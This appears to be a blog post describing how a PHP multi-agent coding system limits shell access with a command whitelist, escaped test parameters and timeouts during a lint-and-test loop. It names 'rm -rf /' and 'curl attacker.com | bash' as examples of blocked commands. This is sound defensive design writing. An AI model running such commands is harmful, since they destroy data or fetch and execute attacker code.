Code-writing agents have a unique problem: how do you know the code you just wrote actually works? You can't just generate code and hope — the AI needs to check its own output. BashTool and RunTestsTool make this possible.
BashTool: Whitelisted Shell Access
BashTool allows command execution, but only specific commands:
private const ALLOWED_COMMANDS = [
'php -l', // Syntax check
'php -r', // Quick PHP execution
'phpunit', // Test execution
'phpstan', // Static analysis
'composer', // Dependency info (not install)
'git diff', // See changes
'git status', // Check state
'git log', // History
];
Every command is checked against this whitelist before execution. An agent can't run rm -rf / or curl attacker.com | bash. It can only lint, test, analyze, and inspect.
Who Gets BashTool
Only VajbCoder and TestAgent. Not ReviewAgent (read-only). Not DocAgent (no need to run commands). Not KIK (orchestrator, not executor).
The reasoning: VajbCoder writes code and needs to verify it compiles. TestAgent writes tests and needs to run them. Other agents don't generate executable artifacts.
The Write-Lint-Test-Fix Loop
VajbCoder's typical iteration pattern:
Iteration 1: Read existing code → understand structure
Iteration 2: Write new code via write_file
Iteration 3: php -l newfile.php → syntax check
If error: read error, fix code, go to step 2
Iteration 4: phpunit --filter NewFeatureTest → run tests
If fail: read failure, fix code, go to step 2
Iteration 5: phpstan analyze newfile.php → static analysis
If errors: fix type hints, go to step 2
Iteration 6: generate_patch (or confirm done) → auto-exit
The self-check loop catches three categories of errors:
- Syntax errors —
php -lcatches missing semicolons, unmatched braces - Logic errors —
phpunitcatches wrong behavior, broken assertions - Type errors —
phpstancatches missing type hints, null safety issues
Without this loop, the agent would generate code in one shot and hand it off. With the loop, the agent iterates until the code passes all checks — or runs out of iterations.
RunTestsTool
A specialized tool for TestAgent:
public function execute(array $params): array
{
$testFile = $params['file'] ?? null; // Specific test file
$filter = $params['filter'] ?? null; // --filter pattern
$suite = $params['suite'] ?? null; // --testsuite name
$command = 'php vendor/bin/phpunit';
if ($testFile !== null) $command .= ' ' . escapeshellarg($testFile);
if ($filter !== null) $command .= ' --filter ' . escapeshellarg($filter);
if ($suite !== null) $command .= ' --testsuite ' . escapeshellarg($suite);
// Execute with timeout
$output = $this->executeWithTimeout($command, 120);
return ['success' => $this->parseSuccess($output), 'content' => $output];
}
Parameters are escaped with escapeshellarg() — no command injection through test file names or filter patterns.
TestAgent's Loop
Iteration 1: Read source code to understand what to test
Iteration 2: Read existing tests for patterns
Iteration 3: Write test file via write_file (tests/ only)
Iteration 4: run_tests(file: 'tests/Unit/NewTest.php')
If fail: read output, fix test, rewrite
Iteration 5: run_tests(filter: 'NewTest') → confirm pass
TestAgent's WriteFileTool is restricted to tests/ — it can't accidentally modify production code while fixing a test failure.
Command Timeout
Both tools enforce execution timeouts:
private function executeWithTimeout(string $command, int $timeoutSeconds): string
{
$process = proc_open($command, $descriptors, $pipes);
// ... read output with timeout ...
if ($elapsedSeconds > $timeoutSeconds) {
proc_terminate($process);
return "Command timed out after {$timeoutSeconds}s";
}
}
Default timeout: 120 seconds. Long enough for a full PHPUnit suite, short enough to prevent infinite loops.
Why Not Give Every Agent BashTool
Shell access is the most powerful tool. An agent with BashTool can:
- Read any file (via
cat) - List directories (via
ls) - Check git history (via
git log) - Run arbitrary PHP (via
php -r)
Even with a whitelist, it's more capability than most agents need. ReviewAgent only needs to read — giving it BashTool would be capability bloat that increases attack surface without benefit.
The principle: every agent gets the minimum tools for its job. VajbCoder needs to lint and test its output → BashTool. ReviewAgent needs to read code → ReadFileTool. KIK needs to delegate → DelegateAgentTool.
Up Next
Next up: ManageScheduleTool and SharedContextTool: Scheduling and Cross-Run Memory — how KIK manages scheduled agent runs via natural language, and how agents persist knowledge across executions.
Comments (0)
No comments yet. Be the first to share your thoughts!
Leave a Comment